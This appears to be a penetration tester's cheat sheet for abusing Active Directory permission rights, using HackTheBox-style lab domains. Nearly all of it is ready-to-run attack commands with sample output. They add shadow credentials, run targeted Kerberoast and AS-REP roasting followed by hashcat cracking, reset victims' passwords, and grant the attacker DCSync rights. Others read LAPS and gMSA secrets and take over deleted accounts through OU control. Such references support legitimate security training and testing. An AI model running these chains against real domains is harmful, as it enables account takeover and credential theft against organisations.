AD ACL
User-GenericWrite
You have GenericWrite on user
msDS-KeyCredentialLink
In this method we add a certificate on targeted user, and use it to login against certificate based protocols.
You can either use certipy to do the all exploitation chain, or bloodyAD to generate certificates
certipy shadow auto -username user@box.htb -p pass -account targeteduser -debug -scheme ldap
bloodyAD --host 'dc.box.htb' -d 'box.htb' -u 'user' -p 'pass' add shadowCredentials targeteduser
python3 PKINITtools/gettgtpkinit.py -cert-pem generated_cert.pem -key-pem generated_priv.pem box.htb/targeteduser targeteduser.ccache
If no TLS/PKINIT protocols are availables and you get errors like KDC_ERR_PADATA_TYPE_NOSUPP, you can try to use startTLS on unsecure LDAP 389 instead.
git clone https://github.com/AlmondOffSec/PassTheCert.git /opt/git/PassTheCert
python3 /opt/git/PassTheCert/Python/passthecert.py -domain box.htb -dc-ip 10.129.75.247 -port 389 -crt generated_cert.pem -key generated_priv.pem
Targeted Kerberoast
We can set a SPN on targeted user and perform usual Kerberoast attack.
# Add SPN
bloodyAD -k --host 'DC01.BOX.HTB' --dc-ip '10.129.41.25' -d 'BOX.HTB' -u 'USER' set object TARGETEDUSER servicePrincipalName -v 'what/ever'
# bloodyAD -k --host 'DC01.BOX.HTB' --dc-ip '10.129.41.25' -d 'VINTAGE.HTB' -u 'USER' get object TARGETEDUSER --attr servicePrincipalName
# Ask TGS
GetUserSPNs.py 'BOX.HTB'/'USER' -k -no-pass -dc-ip 'DC01.BOX.HTB' -dc-host 'DC01.BOX.HTB' -request-user TARGETEDUSER -outputfile /tmp/hashes.kerberoast
# Or nxc ldap DC01.BOX.HTB -d 'BOX.HTB' -u 'USER' -p 'PASS' --kerberoast /tmp/hashes.kerberoast
# Remove SPN
bloodyAD -k --host 'DC01.BOX.HTB' --dc-ip '10.129.41.25' -d 'BOX.HTB' -u 'USER' set object TARGETEDUSER servicePrincipalName
# Crack
hashcat -m 13100 -a 0 /tmp/hashes.kerberoast /usr/share/wordlists/rockyou.txt --potfile-path=HASHCATPOT
You can also use targetedKerberoast tool that automate this process…
targetedKerberoast will add SPN for any vulnerable user, ask TGS and finally remove added SPN.
git clone https://github.com/ShutdownRepo/targetedKerberoast.git /opt/git/targetedKerberoast
pip3 install -r /opt/git/targetedKerberoast/requirements.txt
python3 /opt/git/targetedKerberoast/targetedKerberoast.py -v -d 'box.htb' -u 'user' -p 'pass'
# If you get clock errors please sync with DC ntp
# sudo rdate -n 10.129.75.247
Then use hashcat to crack the hash (TGS)
hashcat -m 13100 /tmp/hash /usr/share/wordlists/rockyou.txt --potfile-path=/home/user/HASHCATPOT
Targeted AS-REP
Pretty close to targeted kerberoast method,
we set the DONT_REQ_PREAUTH property on targeted user to perform targeted AS-REP Roasting
bloodyAD -k --host 'DC01.BOX.HTB' --dc-ip '10.129.41.25' -d 'BOX.HTB' -u 'COMPROMISEDACCOUNT' add uac TARGETEDACCOUNT -f DONT_REQ_PREAUTH
[-] ['DONT_REQ_PREAUTH'] property flags added to TARGETEDACCOUNT's userAccountControl
GetNPUsers.py 'BOX.HTB'/'COMPROMISEDACCOUNT' -k -no-pass -dc-ip 'DC01.BOX.HTB' -dc-host 'DC01.BOX.HTB' -usersfile <(echo -e 'TARGETEDACCOUNT') -outputfile /tmp/hashes.asreproast -format hashcat
$krb5asrep$23$TARGETEDACCOUNT@BOX.HTB:xxxxxxxxxxxxxx
hashcat -m 18200 -a 0 hashes.asreproast /usr/share/wordlists/rockyou.txt --potfile-path=HASHCATPOT
Enable user
That not an attack, but you can enable disabled account
bloodyAD -k --host 'DC01.BOX.HTB' --dc-ip '10.129.41.25' -d 'BOX.HTB' -u 'USER' remove uac TARGETEDUSER -f ACCOUNTDISABLE
[-] ['ACCOUNTDISABLE'] property flags removed from TARGETEDUSER's userAccountControl
User-GenericAll
GenericAll contains GenericWrite.
In addition of GenericWrite actions, GenericAll allow you to set password
Set Password
If you have GenericAll access against an user, you can set the user’s password.
(You probably want to try GenericWrite methods first to retrieve the user’s hash before losing it)
net user robert FNUEOFNSIDsilfelifsef_1 /domain
From linux
# With password
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' set password VICTIM Pototo_123
# With NT HASH
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p ':NTHASH' set password VICTIM Pototo_123
User-WriteOwner
You can set VICTIM’s owner to USER,
then you grants USERS rights on VICTIM.
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' set owner VICTIM USER
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' add genericAll VICTIM USER
#bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' set password VICTIM Pototo_123
Group-WriteOwner
Change owner of “GROUP” to “USER”
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' set owner 'GROUP' 'USER'
Group-Owner
Grant “USER” genericAll right on “GROUP”
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' add genericAll 'GROUP' 'USER'
Group-GenericAll
Add “USER” to group “GROUP”
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' add groupMember 'GROUP' 'USER'
ReadLAPSPassword
Read LAPS local administrators passwords
nxc ldap 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' --module laps
WriteDacl
Add any ACL you want, such as DCSync
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' set DCSync USER
ReadGMSAPassword
Retrieve gMSA account’s NT hash
bloodyAD -k --host 'DC01.BOX.HTB' --dc-ip '10.129.41.25' -d 'BOX.HTB' -u 'USER' -p 'PASS' get object 'GMSA01$' --attr msDS-ManagedPassword
nxc ldap BOX.HTB -u 'USER' -p 'PASS' --gmsa
WriteSPN
Perform Targeted Kerberoast
Reanimate-Tombstones
You can reanimate deleted objects, but you probably need access over destination OU
Listing of deleted objects
ldapsearch -H 'ldap://BOX.HTB' -D USER@BOX.HTB -w 'Pototo_123' -b "DC=BOX,DC=htb" "(isDeleted=*)" -v -E pr=1000/noprompt -E '!1.2.840.113556.1.4.417'
Resolve objectSid
$ cat <<'EOF'|python3
import base64, struct; sid=b"AQUAAAAAAAUVAAAAArr/UoEu+1C7Lcd+VQQAAA=="; b=base64.b64decode(sid); print("S-%d-%d-%s" % (b[0], int.from_bytes(b[2:8], "big"), '-'.join(str(struct.unpack("<I", b[i:i+4])[0]) for i in range(8, len(b), 4))))
EOF
S-1-5-21-1392491010-1358638721-2126982581-1109
You can use https://github.com/charlesgargasson/acedump to list ACEs.
And dacledit to check the specific ACE between USER and given SID
dacledit.py -action 'read' -rights-guid 'bf9679c0-0de6-11d0-a285-00aa003049e2' -principal 'USER' -target-sid 'S-1-5-21-1392491010-1358638721-2126982581' "BOX.HTB"/"USER" -k -no-pass
Powershell command to restore user with SID
Get-ADObject -Filter {objectSid -eq "S-1-5-21-1392491010-1358638721-2126982581-1109"} -IncludeDeletedObjects
Get-ADObject -Filter {objectSid -eq "S-1-5-21-1392491010-1358638721-2126982581-1109"} -IncludeDeletedObjects | Restore-ADObject
If you have control over destination OU, you can then leverage this access to gain control over the account
Example for accounts that don’t have admincount set
# Give ourself fullcontrol over OU
dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'USER' -target-dn 'OU=MYOU,DC=box,DC=htb' 'box.htb'/'USER':'Pototo_1' -k
# Check if we have rights over targeted account
dacledit.py -action 'read' -principal 'USER' -target-dn 'CN=targeteduser,OU=MYOU,DC=box,DC=htb' 'box.htb'/'USER':'Pototo_1' -k
# Then we leverage those rights, with shadowcreds for example
certipy shadow auto -username USER@box.htb -p Pototo_123 -account targeteduser -dc-ip 10.129.123.82 -ns 10.129.123.82